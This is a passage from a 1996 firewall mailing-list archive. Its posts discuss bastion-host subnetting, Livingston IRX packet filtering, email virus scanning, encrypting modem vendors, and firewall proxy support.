bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Message-Id: <9601041534.AA07331@manzanita.DEV.3Com.COM.noname> To: firewalls@greatcircle.com, jonw@mntcmp2.demon.co.uk Subject: Re: Bastion netmask query Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You wrote: > > We have a class C of our own A.B.C.0 and are currently configuring the > network as follows: > > Addresses A.B.C.1 to 15 > > ISP +-----------+ +-----------+ > Lease | Cisco |----------------------| ftp/web | plus others > ---- | 2514 | | machine | as needed > Line | |----------| | | > +-----------+ | +-----------+ > | subnet is A.B.C.16 to 31 > | > | eth0 A.B.C.31 > +-----------+ > | Bastion | Dual Homed > | Machine | > | | > +-----------+ > | eth1 A.B.C.32 > | > | subnet is A.B.C.32 to 254 > -------------------|------------------------ Secure Internal > > Can anyone confirm what the netmasks and broadcast addresses should be for the > two bastion ethernet devices. First of all, these nets are using three different subnet classification schemes. This can cause problems unless carefully managed. The subnet mask 255.255.255.240 will divide your class C address space into 16 subnets of 15 hosts each A.B.C.0, A.B.C.16, A.B.C.32, A.B.C.48, A.B.C.64, A.B.C.80, A.B.C.96, A.B.C.112, A.B.C.128, A.B.C.144, A.B.C.160, A.B.C.176, A.B.C.192, A.B.C.208, A.B.C.224, A.B.C.240. The subnet mask 255.255.255.224 will effectively divide your class C address space into 8 subnets of 31 hosts each: A.B.C.0, A.B.C.32, A.B.C.64, A.B.C.96, A.B.C.128, A.B.C.160, A.B.C.192, A.B.C.224. The subnet mask 255.255.255.192 will divide your class C into 4 subnets of 63 hosts each. A.B.C.0, A.B.C.64, A.B.C.128, A.B.C.192. It is possible to use different masks on each side of the router and bastions machine, but unless you are carefull (or using OSPF) (I don't know how IGRP works), you are asking for trouble by splitting up subnets unevenly. In addition, you will find that any subnet that is part of a smaller division scheme, but not actually used must be thrown away if this is done with RIP (RIP V.2 can help some). On the other hand, you may be able to divide up the Class C, and then assign multiple subnets to your larger net, as long as you remember to use the smaller subnet masking scheme, and let the router handle communications between subnets. I could write a lot more on the subject, but not being sure of your objectives, I'd rather not second guess you here. Good luck, BobK From firewalls-owner Thu Jan 4 09:37:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA11325 for firewalls-outgoing; Thu, 4 Jan 1996 09:31:04 -0800 (PST) Received: from mail.co.stanislaus.ca.us ([204.31.216.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA11320 for ; Thu, 4 Jan 1996 09:31:00 -0800 (PST) Received: from STANCO#u#1-Message_Server by mail.co.stanislaus.ca.us with Novell_GroupWise; Thu, 04 Jan 1996 09:33:35 -0800 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Thu, 04 Jan 1996 09:46:32 -0800 From: Mike Romeo To: jcp@tis.com Cc: firewalls@GreatCircle.COM Subject: Re: Livingston Firewall IRX router -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, We are using a Livingston Firewall IRX @ our site, we try to block all but essential services and then limit those to the hosts that require them. The filtering in the IRX is basically in and/or out on each interface with the following criteria: 1. Source and Destination address with masking/subnetting 2. Protocol (TCP/UDP/ICMP) 3. Source and Destination port (gt/lt/eq, TCP & UDP) or Message Type (ICMP) 4. Established Session The only problem I've had is that when I try to set up a filter for ICMP type 0 (ECHO REPLY if I read the RFC correctly) it refuses to accept that, so I just blocked all ICMP which can be a pain when we have a connectivity problem with our ISP. I'm no TCP Guru and I'm not sure what you mean by dynamic/stateful packet filtering if you clarify (read dumb down) the question maybe I would be able to answer it. Setup was easy, but when you update the filter list there is no way to insert a rule so you have to rekey all the rules after the one you insert which allows a lot of room for finger checks and can cause an inadvertent hole in your system. The packet filtering syntax is less cryptic than CISCO's (IMHO) If you want any more info I'll be happy to try and help ------------------------------------------------------------------------------- Michael Romeo, Sr Systems Programmer Stanislaus County, Modesto Ca. 209-525-5805 romeo@mail.co.stanislaus.ca.us From firewalls-owner Thu Jan 4 10:37:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA13132 for firewalls-outgoing; Thu, 4 Jan 1996 10:35:43 -0800 (PST) Received: from northshore.ecosoft.com (northshore.ecosoft.com [192.233.85.129]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA13126 for ; Thu, 4 Jan 1996 10:35:39 -0800 (PST) Received: from slip-9-14.shore.net by northshore.ecosoft.com with SMTP id AA29503 (5.67a/IDA-1.5 for ); Thu, 4 Jan 1996 13:34:06 -0500 Message-Id: <199601041834.AA29503@northshore.ecosoft.com> Date: Thu, 04 Jan 96 18:35:01 0500 From: Vin McLellan Organization: Privacy Guild X-Mailer: Mozilla 1.1N (Macintosh; I; 68K) Mime-Version: 1.0 To: firewalls@greatcircle.com Subject: Email antivirus software debuts X-Url: http://www.cnet.com/Content/News/Files/0,16,350,00.html Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk FYI: A press release notes Central House Technologies, dba IMA Tech, will distribute software that scans email and attached documents for viruses. The product, Mimesweeper, is priced at $2,875 for 100 users. Mimesweeper redirects incoming mail to a mailbox where it is scanned for unidentifiable attachments or viruses. Messages can pass through the network only if they are scanned, according to Central House officials. Mimesweeper runs on Microsoft Windows NT 3.5 and will support Microsoft Mail and Novell's Groupwise software in the near future, CH officials said. From firewalls-owner Thu Jan 4 10:52:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA13307 for firewalls-outgoing; Thu, 4 Jan 1996 10:48:27 -0800 (PST) Received: from geoworks.com (fusion.geoworks.com [198.211.200.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA13291 for ; Thu, 4 Jan 1996 10:48:21 -0800 (PST) Received: from selenium.geoworks.com.geoworks by geoworks.com (4.1/SMI-4.1) id AA00194; Thu, 4 Jan 96 10:47:11 PST Date: Thu, 4 Jan 96 10:47:11 PST From: cdoane@geoworks.com (Chris Doane) Message-Id: <9601041847.AA00194@geoworks.com> To: jcp@tis.com, ROMEO@mail.co.stanislaus.ca.us Subject: Re: Livingston Firewall IRX router -Reply Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I think Mr. Romeo's mail pretty well covered the features found in the Firewall IRX, but here's something else to consider: Livingston's "free" support is the worst I've ever encountered, expect at the very least a one week turn-around on calls, and this after repeated daily attempts to speak with an engineer. Documentation is abysmal, even the newer version available as a .ps file on their ftp server. I could live with this, except that I've discovered some undocumented features that have caused me grave headaches (ie., setting an IP filter automatically denies all IPX traffic - IPX filtering is extremely poorly documented, not a single example of the syntax). This has been my experience for every occasion I've had to contact Livingston, I would not mention these problems except that I've found this aggravation to far outweigh the benefits of the product. Sincerely, Chris Doane From firewalls-owner Thu Jan 4 11:27:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA13659 for firewalls-outgoing; Thu, 4 Jan 1996 11:10:39 -0800 (PST) Received: from relay5.UU.NET (relay5.UU.NET [192.48.96.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA13653 for ; Thu, 4 Jan 1996 11:10:34 -0800 (PST) Received: from uucp2.UU.NET by relay5.UU.NET with SMTP id QQzxce24629; Thu, 4 Jan 1996 14:09:56 -0500 (EST) Received: from vanguard.UUCP by uucp2.UU.NET with UUCP/RMAIL ; Thu, 4 Jan 1996 14:09:56 -0500 Received: by vanguard.hmp.com (UUPC/extended 1.12b); Thu, 04 Jan 1996 11:32:04 MST Date: Thu, 04 Jan 1996 11:31:58 MST From: "Scott Deshaies" Message-ID: <30ec1d24.vanguard@vanguard.hmp.com> Organization: High Mountain Press, Inc. Reply-To: "Scott Deshaies" To: "Mike Romeo" Cc: "Firewalls Mailing List" Subject: Re: Livingston Firewall IRX router -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 04 Jan 1996 09:46:32 -0800, "Mike Romeo" wrote: > Setup was easy, but when you update the filter list there is no way to > insert a rule so you have to rekey all the rules after the one you insert > which allows a lot of room for finger checks and can cause an > inadvertent hole in your system. The packet filtering syntax is less > cryptic than CISCO's (IMHO) If you use PMConsole, you can insert a line and it does the magic of moving all of the lower rules down for you. (At least it seems to in PMConsole for Windows - I can't vouch for the X version) -- >> Scott R. Deshaies <> High Mountain Press, Inc. << >> MIS Manager <> 2530 Camino Entrada * Santa Fe, NM 87505 << >> sdeshaies@hmp.com <> Direct:505/474-5103 http://www.hmp.com << From firewalls-owner Thu Jan 4 13:22:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA16920 for firewalls-outgoing; Thu, 4 Jan 1996 13:15:19 -0800 (PST) Received: from calima (CALIMA.CIAT.CGIAR.ORG [198.93.225.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA16913 for ; Thu, 4 Jan 1996 13:15:13 -0800 (PST) Received: by calima (Smail3.1.29.1 #1) id m0tXv7g-00032VC; Thu, 4 Jan 96 16:14 WDT Date: Thu, 4 Jan 1996 16:14:48 -0300 (WDT) From: Juan Carlos Machado X-Sender: juank@calima To: firewalls@greatcircle.com Subject: Xtacacs client software for Windows Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk For people interested in TACACS client software for Windows, this is avaliable at ftp.cica.indiana.edu/pub/pc/win3/winsock/xtacac12.zip If information needed about instalation and configuration, feel free to contact me. Juank, _________________________________________________________ ========================================================= Juan Carlos Machado Z. jmachado@calima.ciat.cgiar.org j.machado@cgnet.com Network Support Voice Ph#: (57-2)4450-422 >>>>>>>>>>>>>>>>>>>>>>>>>> :) <<<<<<<<<<<<<<<<<<<<<<<<<<< CIAT (International Center for Tropical Agriculture) Cali - Valle - Colombia. Phone: 4450000 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ JK:= NOT(reflect(opinions' self,opinions' employer)); From firewalls-owner Thu Jan 4 15:37:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA19535 for firewalls-outgoing; Thu, 4 Jan 1996 15:25:34 -0800 (PST) Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA19525 for ; Thu, 4 Jan 1996 15:25:13 -0800 (PST) Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id JAA28192; Fri, 5 Jan 1996 09:18:35 +1000 Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma028173; Fri Jan 5 09:18:14 1996 Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA19977; Fri, 5 Jan 1996 09:23:46 +1000 From: sgcccdc@citec.qld.gov.au (Colin Campbell) Message-Id: <9601042323.AA19977@citecub.citec.qld.gov.au> Subject: Re: Bastion netmask query To: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Date: Fri, 5 Jan 1996 09:23:45 +1000 (EST) Cc: firewalls@greatcircle.com In-Reply-To: <9601041534.AA07331@manzanita.DEV.3Com.COM.noname> from "Bob Konigsberg" at Jan 4, 96 07:34:31 am X-Mailer: ELM [version 2.4 PL24 PGP3 *ALPHA*] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My mailer thinks Bob Konigsberg said: > [picture chomped] > > First of all, these nets are using three different subnet > classification schemes. This can cause problems unless carefully managed. > > The subnet mask 255.255.255.240 will divide your class C > address space into 16 subnets of 15 hosts each > A.B.C.0, A.B.C.16, A.B.C.32, A.B.C.48, > A.B.C.64, A.B.C.80, A.B.C.96, A.B.C.112, > A.B.C.128, A.B.C.144, A.B.C.160, A.B.C.176, > A.B.C.192, A.B.C.208, A.B.C.224, A.B.C.240. > > > The subnet mask 255.255.255.224 will effectively divide your class C > address space into 8 subnets of 31 hosts each: > A.B.C.0, A.B.C.32, A.B.C.64, A.B.C.96, > A.B.C.128, A.B.C.160, A.B.C.192, A.B.C.224. > > The subnet mask 255.255.255.192 will divide your class C into 4 subnets > of 63 hosts each. > A.B.C.0, A.B.C.64, > A.B.C.128, A.B.C.192. > The network people here will not allow the first and last subnets to be used because there are too many systems around that do not support the classless routing required. Apparently these systems work out whether the address is an A, B or C and then applies the netmask. Thus A.B.C.0 subnetted is no differnet to A.B.C.0 w/o subnet and A.B.C.192. has a "network address" of all "1"s which is the broadcast address. Anyone care to comment? [chomp the rest] Colin From firewalls-owner Thu Jan 4 16:52:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA21754 for firewalls-outgoing; Thu, 4 Jan 1996 16:38:11 -0800 (PST) Received: from venera.isi.edu (venera.isi.edu [128.9.0.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA21743 for ; Thu, 4 Jan 1996 16:38:07 -0800 (PST) From: bmanning@ISI.EDU Received: from zed.isi.edu by venera.isi.edu (5.65c/5.61+local-22) id ; Thu, 4 Jan 1996 16:37:13 -0800 Posted-Date: Thu, 4 Jan 1996 16:29:59 -0800 (PST) Message-Id: <199601050029.AA07586@zed.isi.edu> Received: by zed.isi.edu (5.65c/4.0.3-4) id ; Thu, 4 Jan 1996 16:29:59 -0800 Subject: Re: Bastion netmask query To: sgcccdc@citec.qld.gov.au (Colin Campbell) Date: Thu, 4 Jan 1996 16:29:59 -0800 (PST) Cc: bobk@manzanita.dev.3com.com, firewalls@greatcircle.com In-Reply-To: <9601042323.AA19977@citecub.citec.qld.gov.au> from "Colin Campbell" at Jan 5, 96 09:23:45 am X-Mailer: ELM [version 2.4 PL25] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > The subnet mask 255.255.255.192 will divide your class C into 4 subnets > > of 63 hosts each. > > A.B.C.0, A.B.C.64, > > A.B.C.128, A.B.C.192. > > > > The network people here will not allow the first and last subnets to be > used because there are too many systems around that do not support the > classless routing required. Apparently these systems work out whether > the address is an A, B or C and then applies the netmask. Thus A.B.C.0 > subnetted is no differnet to A.B.C.0 w/o subnet and A.B.C.192. has a > "network address" of all "1"s which is the broadcast address. > > Anyone care to comment? > > Colin Two RFC's: RFC 1878 - Variable Length Subnet Table For IPv4 RFC 1597 - Private Networks. -- --bill From firewalls-owner Thu Jan 4 19:37:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA24534 for firewalls-outgoing; Thu, 4 Jan 1996 19:28:07 -0800 (PST) Received: from ix8.ix.netcom.com (ix8.ix.netcom.com [199.182.120.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA24529 for ; Thu, 4 Jan 1996 19:28:04 -0800 (PST) Received: from ix-wp1-20.ix.netcom.com by ix8.ix.netcom.com (8.6.12/SMI-4.1/Netcom) id TAA20010; Thu, 4 Jan 1996 19:27:26 -0800 Date: Thu, 4 Jan 1996 19:27:26 -0800 Message-Id: <199601050327.TAA20010@ix8.ix.netcom.com> X-Sender: sgfarkas@ix.netcom.com X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: SorG Farkas Subject: Gauntlet from TIS Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If any of you has experience with Gauntlet, I would appreciate any info about it (if it does what it promises, if it's reliable, any problems you encountered, any do's and don'ts, experience with the support from them, etc.). We are considering it for my company. Thanks a lot. From firewalls-owner Thu Jan 4 19:55:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA24458 for firewalls-outgoing; Thu, 4 Jan 1996 19:21:35 -0800 (PST) Received: from kinks.eng.usf.edu (kinks.eng.usf.edu [131.247.14.94]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id TAA24453 for ; Thu, 4 Jan 1996 19:21:32 -0800 (PST) Received: (from black@localhost) by kinks.eng.usf.edu (8.7.1/8.7.1) id WAA07917; Thu, 4 Jan 1996 22:20:49 -0500 (EST) Date: Thu, 4 Jan 1996 22:20:48 -0500 (EST) From: James Black X-Sender: black@kinks To: firewalls@greatcircle.com Subject: sorry, wrong heading Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, Sorry for sending an improper message, I used the wrong heading. ========================================================================== James Black (Comp Sci/Comp Eng sophomore) e-mail: black@eng.usf.edu http://www.eng.usf.edu/~black/index.html "An idea that is not dangerous is unworthy of being called an idea at all." Oscar Wilde ************************************************************************** From firewalls-owner Thu Jan 4 20:07:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA24490 for firewalls-outgoing; Thu, 4 Jan 1996 19:24:19 -0800 (PST) Received: from relay.ashton.csc.com (relay.ashton.csc.com [20.2.54.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA24485 for ; Thu, 4 Jan 1996 19:24:15 -0800 (PST) Received: by relay.ashton.csc.com; id WAA22835; Thu, 4 Jan 1996 22:23:26 -0500 Received: from mccoy.ashton.csc.com(20.2.51.2) by relay.ashton.csc.com via smap (g3.0.1) id sma022831; Thu, 4 Jan 96 22:23:19 -0500 Received: (from ckostick@localhost) by mccoy.ashton.csc.com (8.6.9/8.6.9) id WAA07347; Thu, 4 Jan 1996 22:36:36 -0500 From: Chris Kostick Message-Id: <199601050336.WAA07347@mccoy.ashton.csc.com> Subject: Summary of encrypting modems To: firewalls@greatcircle.com Date: Thu, 4 Jan 1996 22:36:36 -0500 (EST) Cc: john.malouf@hksystems.com (John Malouf) In-Reply-To: <199601031546.KAA18448@relay.ashton.csc.com> from "John Malouf" at Jan 3, 96 08:48:52 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A summary of encrypting modems and vendors in response to the post I put out. >Can anyone provide me a list of vendors who make encrypting modems? >That is, a modem with encryption in hardware rather than software >on a machine just sending out over a modem. > >-- >chris -- REPSONSE -- Contact Paralon Technologies in Bellview (Sp?) Washington for an 'encrypting black box' that goes between the modem and the serial port and works with regular modems... Far cheaper than encrypting modems. It is hardware DES encryption... with a negotiated session key. -- REPSONSE -- This is in answer to your request for info on encrypting modems... I recently received info from a local consulting firm about the SafeNet solutions from Information Resource Engineering, Inc. (IRE) All I really have is a brochure, but it gives some numbers etc for contacting IRE directly. Here you go, I hope this helps. Information Resource Engineering, Inc. 8029 Corporate Drive Baltimore, Maryland 21236 (410)931-7500 (410)931-7524 FAX -- REPSONSE -- the top of the line zyxel does v.34, isdn, and hardware des encryption. don't know how it negotiates the encryption parameters, so you probably have to use them in pairs. -- REPSONSE -- look at http://www.netcomm.com.au/2_produc/smartmdm.htm for the SmartModem product. it says encryption, but unclear as to how it's implemented. -- REPSONSE -- Chris, Here is an old list of Modem Encryption vendors I had. This is old and they may have combined with another company or moved but here they are. I have worked with vendores Jones Futurex and Racal-Milgo qite a bit with some of their products. This is not an endorsement for any of these vendors: Old Security Modem Vendors List: Adaptive Computer Technologies, CA 415 324-0121 Anchor Automation, CA 818 998-6100 AT&T, NJ 201 221-2200 Bizcomp Corp, CA 408 733-7800 CASE/Datatel, Inc NJ 609 424-4451 Cermetek Microelectronics Inc, CA 408 752-5000 Codex Corp, MA 617 364-2000 Concord Data Systems Inc, MA 508 460-0808 CXR Telcom/Anderson Jacobson, CA 408 435-8520 Data Race, Inc, TX 512 692-3909 Datec, Inc, NC 800 334-7722 Digital Pathways, Inc, CA 415 964-0707 Emucom, Inc, 508 970-1189 Fastcomm Data Corp, VA 703 620-3900 Gandalf Data Inc, 312 541-6060, 800 GANDALF Jones Futurex, CA 916 632-3456 Microcom Inc, MA 508 551-1000 Natural Microsystems Corp, MA 508 655-0700 NEC America, Inc, CA 408 433-1250 Octocom Systems, MA 508 658-6050 Okidata Corp, NJ 609 235-2600 Prometheus Productions, Inc, OR 503 624-0571 Racal-Milgo, Inc, FL 305 476-5609, 800 327-4440 Racal-Vadic, Inc CA 408 946-2227 Singer Data Products Inc, IL 312 860-6500 Transend Corp, CA 415 851-3402 Tri-Data Systems Inc, CA 408 746-2900 Universal Data Systems, AL 205 721-8000 Visionary Electronics, Inc, CA 415 751-8811 Western DataCom Co, OH 216 835-1510 ZyXEL, CA 714 693-0808 From firewalls-owner Thu Jan 4 23:56:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA28453 for firewalls-outgoing; Thu, 4 Jan 1996 23:51:17 -0800 (PST) Received: from bbmail1.unisys.com (bbmail1.unisys.com [192.63.200.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id XAA28448 for ; Thu, 4 Jan 1996 23:51:13 -0800 (PST) Received: from mvdns1.mv-oc.unisys.com (mvdns1.mv.unisys.com [192.59.253.100]) by bbmail1.unisys.com (8.6.12/8.6.12) with SMTP id HAA14906 for ; Fri, 5 Jan 1996 07:50:31 GMT Received: by mvdns1.mv-oc.unisys.com (4.1/SMI-4.1-1.8) id AA18074; Thu, 4 Jan 96 23:59:20 PST From: fw@MV-oc.Unisys.COM (Firewall information) Message-Id: <9601050759.AA18074@mvdns1.mv-oc.unisys.com> Subject: Re: Firewall-1 Documentation To: firewalls@greatcircle.com Date: Thu, 4 Jan 1996 23:59:18 +57823603 (PST) In-Reply-To: from "Thierry Boivin" at Nov 30, 95 04:40:12 pm X-Mailer: ELM [version 2.4 PL21] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Actually I have purchased additonal copies of the manual for 1.2 for out vendor Qualix (415) 572-0200. I don't know if you can buy them without having purchased the product. Chris Liebsack Unisys > > >From: F.Wetzels@amc.uva.nl > >Date: Wed, 29 Nov 1995 09:54:20 +0100 > >Subject: Firewall-1 Documentation > >To: firewalls@greatcircle.com > >X-Sun-Charset: US-ASCII > >Sender: firewalls-owner@GreatCircle.COM > >Precedence: bulk > > > >Hi, > > > >I was wondering if there is any documentation about the latest > >version of the firewall-1 product. I do not mean www.checkpoint.com. > >(or something like that) but a solid, (now) well written documentation. > >Or is it delivered on CD? The documentation that came with version > >1.07 was very poor. > > > > > > > >Frank. > > > > Extracted from Solstice FireWall-1 (release 1.2.1) Installation and User's > Guide: > > "All solstice fireWall-1 products are separately licensed and require a > licence password to enable them. The "solstice Firewall-1 Base Pack" > includes the documentation for all solstice Firewall-1 products as well as > all basic software components. These products may be used in demonstration > mode without obtaining a password." > > In france, The price of this "Base Pack" is about 220$. > > > _______________________________________________ > Thierry Boivin > Control Data Toulouse /\ ~ > 36 rue Jacques Babinet / \/\ /\ > 31100 Toulouse (France) / \ \ / \ > Tel:62115432 Fax:61400842 / o \ / \ > Thierry.Boivin@cdc.com | / \ > _______________________________________________ > > > From firewalls-owner Fri Jan 5 03:07:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA02432 for firewalls-outgoing; Fri, 5 Jan 1996 03:02:30 -0800 (PST) Received: from relay-4.mail.demon.net (relay-4.mail.demon.net [158.152.1.64]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA02426 for ; Fri, 5 Jan 1996 03:02:18 -0800 (PST) Received: from post.demon.co.uk ([158.152.1.72]) by relay-4.mail.demon.net id ab07038; 5 Jan 96 10:57 GMT Received: from splus.demon.co.uk ([158.152.176.47]) by relay-3.mail.demon.net id aa16290; 5 Jan 96 10:55 GMT Date: Fri, 5 Jan 1996 10:46:15 GMT From: Ian Miller Reply-To: firewalls@splus.demon.co.uk Message-Id: <44@splus.demon.co.uk> To: firewalls@greatcircle.com Subject: Re: Re: Livingston Firewall IRX router -Reply X-Mailer: FIMail V0.9d X-User: Alpha Test Version Of FI-Mail, DisWin 1.5C:\WINDOWS\DEMON\WINDIS Lines: 15 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In your message dated Thursday 4, January 1996 you wrote : > The only problem I've had is that when I try to set up a filter for ICMP > type 0 (ECHO REPLY if I read the RFC correctly) it refuses to accept > that, so I just blocked all ICMP which can be a pain when we have a > connectivity problem with our ISP. I noticed this problem too. It does not seem to accept zero as a 'port number', so you cannot say "eq 0". However it accepts "lt 1" which should be equivalent, which is what I am using. [Though I haven't actually been about to test the filter yet.] Ian -- From firewalls-owner Fri Jan 5 05:52:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA04647 for firewalls-outgoing; Fri, 5 Jan 1996 05:43:15 -0800 (PST) Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA04640 for ; Fri, 5 Jan 1996 05:43:08 -0800 (PST) Received: from gw.rmcs.cranfield.ac.uk by relay6.UU.NET with SMTP id QQzxfa09454; Fri, 5 Jan 1996 08:42:07 -0500 (EST) Date: Fri, 5 Jan 1996 13:38:33 GMT From: Neil To: firewalls@greatcircle.com Message-Id: <960105133833.212c@rmcs.cranfield.ac.uk> Subject: Source Routed Packets Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am currently using, in a trial firewall, a Sun SPARC 10 running a kernel with IP packet forwarding turned off. The only problem is that SunOS will still (I believe) allow IP source routed packets through the bastion host. Is there a software fix for this available that does not mean buying a screening Cisco or something like that? Yours Aye, Neil * Neil A Carson * The Royal Military College of Science, Shrivenham * e-mail carson@rmcs.cranfield.ac.uk * Address: Kitchener Mess, RMCS, Shrivenham SN6 8LA. Tel: (01793) 784428 (Home) From firewalls-owner Fri Jan 5 06:52:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA05410 for firewalls-outgoing; Fri, 5 Jan 1996 06:38:33 -0800 (PST) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA05405 for ; Fri, 5 Jan 1996 06:38:29 -0800 (PST) Received: from pm1-29.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA07804; Fri, 5 Jan 96 09:37:15 -0500 Date: Fri, 5 Jan 96 09:37:15 -0500 Message-Id: <9601051437.AA07804@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Neil From: frankw@in.net (Frank Willoughby) Subject: Re: Source Routed Packets Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Neil, >I am currently using, in a trial firewall, a Sun SPARC 10 running a kernel >with IP packet forwarding turned off. > >The only problem is that SunOS will still (I believe) allow IP source >routed packets through the bastion host. > It is difficult to tell which firewall you are evaluating. Can you be more specific? >Is there a software fix for this available that does not mean buying a >screening Cisco or something like that? > > Yours Aye, > > Neil > >* Neil A Carson >* The Royal Military College of Science, Shrivenham >* e-mail carson@rmcs.cranfield.ac.uk >* Address: Kitchener Mess, RMCS, Shrivenham SN6 8LA. Tel: (01793) 784428 (Home) Best Regards, Frank Fortified Networks Inc. - Management & Information Security Consulting Phone: (317) 573-0800 - http://www.fortified.com/fortified/ The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. From firewalls-owner Fri Jan 5 07:10:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA05861 for firewalls-outgoing; Fri, 5 Jan 1996 07:02:50 -0800 (PST) Received: from mwunix.mitre.org (mwunix.mitre.org [128.29.154.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA05855 for ; Fri, 5 Jan 1996 07:02:46 -0800 (PST) Received: from smiley.sit (smiley.mitre.org [128.29.140.20]) by mwunix.mitre.org (8.6.10/8.6.4) with SMTP id KAA24402 for ; Fri, 5 Jan 1996 10:02:08 -0500 Received: from [128.29.140.130] (mckenney-mac) by smiley.sit (4.1/SMI-4.1) id AA13057; Fri, 5 Jan 96 10:02:02 EST Date: Fri, 5 Jan 96 10:02:01 EST Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.COM From: mckenney@smiley.mitre.org (Brian W. McKenney) Subject: SSL and S-HTTP Proxy support Cc: mckenney@smiley.mitre.org Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I would like to have an update as to which commercial firewall vendors support or plan to support (when) an SSL and/or S-HTTP proxy. I will post a summary. This is the information that I have: 1. TIS Gauntlet: SSL annd S-HTTP proxies in next release. 2. KarlBridge/KarlBrouter: S-HTTP proxy 3. Milkyway Blackhole: S--HTTP 4. SOS Brimstone: S-HTTP proxy 5. Technologic Interceptor: S-HTTP proxy 6. V-One SmartWall: S-HTTP proxy License versions of TIS Gauntlet will support whatever the next Gauntlet release supports. -Brian Respectfully, Brian W. McKenney (mckenney@mitre.org) Network Security Engineering The MITRE Corporation Mail Stop: Z-231 7525 Colshire Drive McLean, VA 22102 Voice: 703-883-5463 Fax: 703-883-1245 From firewalls-owner Fri Jan 5 07:55:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA06299 for firewalls-outgoing; Fri, 5 Jan 1996 07:26:10 -0800 (PST) Received: from colt.milepost.com (colt.milepost.com [164.57.50.2]) by miles.greatcircle.com 